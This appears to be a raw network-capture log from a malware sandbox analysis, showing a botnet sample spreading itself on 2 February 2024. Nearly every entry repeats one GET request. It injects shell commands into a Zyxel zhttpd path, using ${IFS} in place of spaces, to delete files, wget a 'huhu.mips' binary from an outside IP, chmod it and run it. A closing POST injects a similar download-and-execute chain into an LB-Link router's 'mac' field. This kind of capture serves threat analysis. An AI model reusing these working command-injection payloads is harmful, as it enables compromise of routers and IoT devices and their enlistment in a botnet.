                                                        Feb 2, 2024 06:21:23.207237959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7776192.168.2.145894424.232.139.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207257986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7777192.168.2.1447916216.91.49.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207287073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7778192.168.2.143634617.93.140.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207329035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7779192.168.2.145500642.31.106.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207372904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7780192.168.2.1442698151.95.135.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207400084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7781192.168.2.143819439.34.85.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207439899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7782192.168.2.1450906161.182.177.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207483053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7783192.168.2.1459650184.201.165.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207523108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7784192.168.2.143798836.148.193.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207544088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7785192.168.2.1443058166.7.232.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207612038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7786192.168.2.14467309.109.97.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207652092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7787192.168.2.144450254.30.36.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207693100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7788192.168.2.144185014.167.127.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207721949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7789192.168.2.1434458130.17.115.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207772017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7790192.168.2.1434224135.210.18.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207818985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7791192.168.2.144072831.215.110.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207854986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7792192.168.2.1433406192.70.71.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207901001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7793192.168.2.144522842.215.159.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207927942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7794192.168.2.1458790123.173.194.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207946062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7795192.168.2.1438210101.246.184.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207988977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7796192.168.2.144484437.141.195.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208013058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7797192.168.2.145082853.253.75.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208059072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7798192.168.2.144946478.95.204.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208102942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7799192.168.2.14609548.148.56.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208154917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7800192.168.2.1450678135.190.57.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208205938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7801192.168.2.145949469.34.187.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208245993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7802192.168.2.144609697.81.52.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208271980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7803192.168.2.144502220.201.85.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208327055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7804192.168.2.144504672.222.165.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208344936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7805192.168.2.145921873.137.174.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208399057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7806192.168.2.144462252.46.171.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208425999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7807192.168.2.1454034153.190.21.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208472013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7808192.168.2.1460788117.146.200.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208481073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7809192.168.2.143429453.65.158.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208520889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7810192.168.2.1437932198.201.250.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208547115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7811192.168.2.1455110153.72.95.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208580017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7812192.168.2.1454904151.39.102.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208619118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7813192.168.2.143425852.34.219.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208678007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7814192.168.2.1453638154.229.249.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208722115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7815192.168.2.1436996103.209.218.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208745003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7816192.168.2.145843060.107.120.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208786964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7817192.168.2.1449834182.93.134.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208811998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7818192.168.2.145009099.170.61.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208851099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7819192.168.2.1437188103.198.173.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208880901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7820192.168.2.1444992182.103.219.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208909988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7821192.168.2.1436858113.114.136.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.208956957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7822192.168.2.1444722129.109.60.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209007978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7823192.168.2.143278244.17.246.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209059954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7824192.168.2.1454444161.155.193.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209094048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7825192.168.2.1439338134.143.242.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209144115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7826192.168.2.146001498.158.139.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209182978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7827192.168.2.1435606203.238.67.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209238052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7828192.168.2.1441702194.126.21.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209239006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7829192.168.2.1450694200.180.221.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209296942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7830192.168.2.1448806121.111.228.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209347963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7831192.168.2.1447938194.162.230.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.209387064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7832192.168.2.1456212147.128.162.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.212726116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7833192.168.2.1437902136.250.55.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.212759972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7834192.168.2.1456172104.21.76.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.351103067 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:23.468113899 CET328INHTTP/1.1 400 Bad Request
                                                        Server: cloudflare
                                                        Date: Fri, 02 Feb 2024 05:21:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        CF-RAY: -
